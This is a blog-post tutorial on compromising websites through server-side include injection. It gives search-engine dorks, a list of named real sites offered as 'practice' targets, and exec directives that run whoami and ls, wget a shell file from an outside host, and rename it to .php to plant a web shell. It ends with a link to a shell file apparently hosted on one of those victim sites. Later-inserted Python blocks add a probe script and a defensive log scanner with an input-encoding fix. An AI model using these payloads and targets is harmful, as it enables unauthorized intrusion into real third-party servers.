Sunday, December 23, 2012

Upload a shell via SSI injection

Things you will need:

1) A site vulnerable to SSI injection (I will give a few dorks and a few vulnerable sites to practice on)

2) Common sense.

What is SSI?

SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of SSI already in use in the application, or by forcing its use through user input fields.

If an attacker submits a Server-side Include statement, he may have the ability to execute arbitrary operating system commands, or include a restricted file's contents the next time the page is served.

Description Taken From: http://nightcode.weebly.com/ssi-injection.html

Chapter I - Finding a vulnerable site

I will provide a few dorks for this type of injection (the full list is at the end of the post).
The best dork I found is

Code:
inurl:bin/Cklb/

but it gave about 863 results, so it is not that usable on its own.

Let's get to work, shall we ;)

Enter that dork in Google and go testing.

Chapter II - Testing a site

So once you have used that dork and opened one site, you must determine if the site is vulnerable to this type of injection.

Here are some commands you can use:
Credits: Stewie™
Code:
<!--#echo var="DATE_LOCAL" -->
Will display the date

<!--#exec cmd="whoami" -->
Will show which user the web server is running as

<pre><!--#exec cmd="ls -a" --></pre> (Linux)
Will display all files in the directory

<pre><!--#exec cmd="dir" --></pre> (Windows)
Will display all files in the directory

Note: the directive has to start with exactly <!--# (no space before the #); with a space, the server treats it as an ordinary HTML comment and nothing runs. The <pre></pre> tags do not make a command execute, they only keep the line breaks of multi-line output (such as a directory listing) readable in the browser instead of collapsing it into one line. If echo works but exec comes back as "[an error occurred while processing this directive]", the server parses includes but has exec disabled (Apache's IncludesNOEXEC option), so you can read server variables but not run commands.

Now take one of the commands and insert it in search boxes or login fields.
Mostly login fields are vulnerable, but there are some cases where search boxes are vulnerable.

NOTE: You must enter your command into both fields (if the login form is vulnerable!!)

Here is my example site:

Code:
http://dev.stockphotosamerica.com/bin/Cklb

PLEASE GO EASY ON THIS SITE.
DO NOT HAMMER IT!

And when I insert a command:
Code:
<pre><!--#exec cmd="ls -a" --></pre>

(screenshots: the directory listing appears in the response page)

Now we see that our command executed successfully and that our site is vulnerable....
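Before reaching for exec, here is a quieter way to answer the same question (does the server parse directives in this field?), added here as an example; it is not code from the original tutorial. It injects Apache mod_include's set/echo pair with a random marker, which runs nothing on the host and still works where exec is switched off, and it tells "executed" apart from "reflected verbatim", "HTML-escaped" and "not reflected at all". The probe() URL and form field names are whatever the target form uses (assumptions), and the sample responses at the bottom are constructed, not captured from any site.

```python
"""Non-destructive SSI injection probe using set/echo instead of exec."""
import html
import secrets
import urllib.parse
import urllib.request

# Apache's default SSIErrorMsg; seeing it means mod_include parsed our input.
ERROR_TEXT = "[an error occurred while processing this directive]"


def build_probe(marker: str) -> str:
    """SSI payload that prints `marker` only if the server parses directives.

    set/echo are standard mod_include elements: unlike exec they execute
    nothing, and they keep working when IncludesNOEXEC is configured.
    """
    return f'<!--#set var="ssiprobe" value="{marker}" --><!--#echo var="ssiprobe" -->'


def classify(body: str, marker: str) -> str:
    """Decide what the server did with the probe, from the response body.

    executed     - only the marker came back: directives are being parsed
    reflected    - the directive came back verbatim: echoed, but page not SSI-parsed
    escaped      - the directive came back HTML-encoded: input is sanitised
    parsed_error - mod_include reported an error: parsing is on, directive rejected
    absent       - the input was not reflected at all
    """
    probe = build_probe(marker)
    if probe in body:
        return "reflected"
    if html.escape(probe, quote=True) in body or html.escape(probe, quote=False) in body:
        return "escaped"
    if marker in body:
        return "executed"
    if ERROR_TEXT in body:
        return "parsed_error"
    return "absent"


def probe(url: str, field_names, extra_fields=None, timeout: float = 10.0) -> str:
    """POST the probe into every named form field and classify the response.

    `url`, `field_names` and `extra_fields` are assumptions about the target
    form (the tutorial's login forms need the payload in both fields).
    Needs network access; the offline samples below do not call this.
    """
    marker = "ssiprobe" + secrets.token_hex(8)
    form = dict(extra_fields or {})
    for name in field_names:
        form[name] = build_probe(marker)
    req = urllib.request.Request(
        url,
        data=urllib.parse.urlencode(form).encode(),
        headers={"User-Agent": "ssi-probe/0.1"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, errors="replace")
    return classify(body, marker)


# Constructed sample responses (not captured from any real site), one per outcome.
_MARKER = "ssiprobe0123abcd"
SAMPLE_RESPONSES = {
    "executed": f"<p>Login failed for user {_MARKER}</p>",
    "reflected": f"<p>Login failed for user {build_probe(_MARKER)}</p>",
    "escaped": f"<p>Login failed for user {html.escape(build_probe(_MARKER), quote=True)}</p>",
    "parsed_error": f"<p>Login failed for user {ERROR_TEXT}</p>",
    "absent": "<p>Login failed</p>",
}


def check_samples() -> dict:
    """Classify every constructed sample; returns {expected: observed}."""
    return {want: classify(body, _MARKER) for want, body in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for want, got in check_samples().items():
        print(f"{want:13} -> {got}")
    # Live use (assumed form): probe("http://target/user/login.shtml", ["username", "password"])
```

A "parsed_error" result is worth a second look: the page is SSI-parsed, so a different directive (echo of a server variable, include of a local file) may still go through even if set/echo was rejected.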

Chapter III - Spawning a shell

So we have our vulnerable site and we are ready to upload a shell.
First of all you will need a .TXT copy of your favourite shell (host it somewhere: free hosting, a hacked site or anything you've got). Keep it as .txt on the hosting side so that host serves it as plain text instead of executing it.

Now we must download it to our site like this:
Code:
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

Replace the URL with wherever your shell is hosted and you are ready to go.

wget saves the file in the working directory of the web server process, which is not necessarily the directory of the .shtml page, and the user the server runs as (the one whoami showed) needs write permission there. If the file does not turn up in the listing, run pwd and id through the same exec directive to see where you are and who you are, or give wget an explicit output path with -O.

Now just paste it into the fields and press Login or Enter.


To see if your .TXT file downloaded, run the listing command from before:
Code:
<pre><!--#exec cmd="ls -a" --></pre>

If you see that it downloaded successfully, you must now rename it from .txt to .php!
You can use this command:
Code:
<!--#exec cmd="mv shell.txt shell.php" -->

Rename the file to whatever you need (of course you must put your .TXT name first). The rename only helps if the server actually hands .php files to a PHP interpreter; if it does not, the renamed file is served as plain text and nothing runs, so check for PHP on the host (for example php -v through exec) before you bother.

My command:
Code:
<!--#exec cmd="mv config1.txt config.php" -->

Now list the files again and find your file.
If you did, just access it in the browser.

(screenshots: the listing with the renamed file, and the shell opened in the browser)

That would be the end of this tutorial.
I hope you learned something. Don't trash sites with this
(be smart and use them wisely).
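For the defending side, an added example that is not part of the tutorial: the same directives show up in the web server's logs and in the application's own templates. The block below flags SSI directives in Apache access log request lines (including double-encoded ones, and the login.shtml?page= style of the dorks), and shows the encoding that stops a page from ever treating a submitted field as a directive. The log lines are constructed, the IP addresses are from documentation ranges, and the function names and regexes are mine.

```python
"""Find SSI directives in access logs, and encode user input so they cannot fire."""
import html
import re
import urllib.parse

# Apache "combined" log format; we only need client IP, timestamp, target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Opening of a mod_include directive.  Apache needs "<!--#" exactly, but attackers
# try variants, so tolerate whitespace around the "#" and ignore case.
SSI_RE = re.compile(
    r'<!--\s*#\s*(exec|include|echo|set|printenv|config|fsize|flastmod|if|elif|else|endif)\b',
    re.IGNORECASE,
)


def decode_target(target: str) -> str:
    """URL-decode the request target twice so double-encoded payloads surface."""
    once = urllib.parse.unquote_plus(target)
    return urllib.parse.unquote_plus(once)


def find_ssi_in_request(line: str):
    """Return a finding dict if the request line carries an SSI directive, else None.

    Only the request line is in the access log, so this catches injection via
    the query string; POST bodies (the login fields in the tutorial) need
    request-body logging such as mod_security to be visible at all.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hit = SSI_RE.search(decoded)
    if not hit:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "directive": hit.group(1).lower(),
        "status": int(m.group("status")),
        "decoded_target": decoded,
    }


def scan(lines):
    """Run find_ssi_in_request over an iterable of log lines, keeping the hits."""
    return [hit for hit in map(find_ssi_in_request, lines) if hit]


def render_user_value(value: str) -> str:
    """Encode user input before it is written into an SSI-parsed page.

    mod_include only recognises a directive that starts with a literal '<',
    so entity-encoding '<', '>', '&' and quotes is enough to keep
    <!--#exec ... --> from ever being seen as a directive.  This is the fix
    for the bug the tutorial exploits: copying a submitted field straight
    into a .shtml page.
    """
    return html.escape(value, quote=True)


def login_error_fragment(username: str, safe: bool = True) -> str:
    """Fragment of a .shtml error page that repeats the submitted username.

    safe=False reproduces the vulnerable pattern (raw interpolation);
    safe=True is the hardened version.
    """
    shown = render_user_value(username) if safe else username
    return f'<p class="error">Login failed for user {shown}</p>'


# Constructed log lines for the example (not captured from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Dec/2012:14:02:11 +0000] "GET /user/login.shtml?page=%3C%21--%23exec%20cmd%3D%22ls%20-a%22%20--%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Dec/2012:14:02:40 +0000] "GET /user/search.shtml?q=%253C%2521--%2523include%2520virtual%253D%2522/etc/passwd%2522%2520--%253E HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Dec/2012:14:03:02 +0000] "GET /user/login.shtml HTTP/1.1" 200 3300 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Dec/2012:14:03:05 +0000] "POST /user/login.shtml HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} #{hit["directive"]} -> {hit["decoded_target"]}')
    print(login_error_fragment('<!--#exec cmd="id" -->', safe=False))
    print(login_error_fragment('<!--#exec cmd="id" -->', safe=True))
```

A 200 on a request carrying #exec is the line to chase first; a 302 or 403 on the same payload is still a probe worth tying to the source address. On the application side, the encoded fragment is what a .shtml page should contain; pairing it with Options IncludesNOEXEC on the server limits what an injection that does slip through can do.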

Dorks
Credits: Stewie™

Code:
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Vulnerable sites to practice on:
Credits: Dan

Code:
http://www.glasshouseimages.com/user/login.shtml
http://www.wppionlinecontest.com/user/login.shtml
www.cgibackgrounds.com/user/login.shtml
www.getstock.com/user/login.shtml
www.estostock.com/user/login.shtml
http://www.blendimages.com/user/login.shtml
http://www.pdnthelook.com/user/login.shtml
http://iloveimages.com/user/login.shtml
http://www.win-initiative.com/user/login.shtml (view source to see output)
http://thegatheringsphotocontest.com/user/login.shtml

To get a shell up, just wget the shellcode and make the output something such as "shell.txt".

Code:
http://www.cgibackgrounds.com/Dan.txt


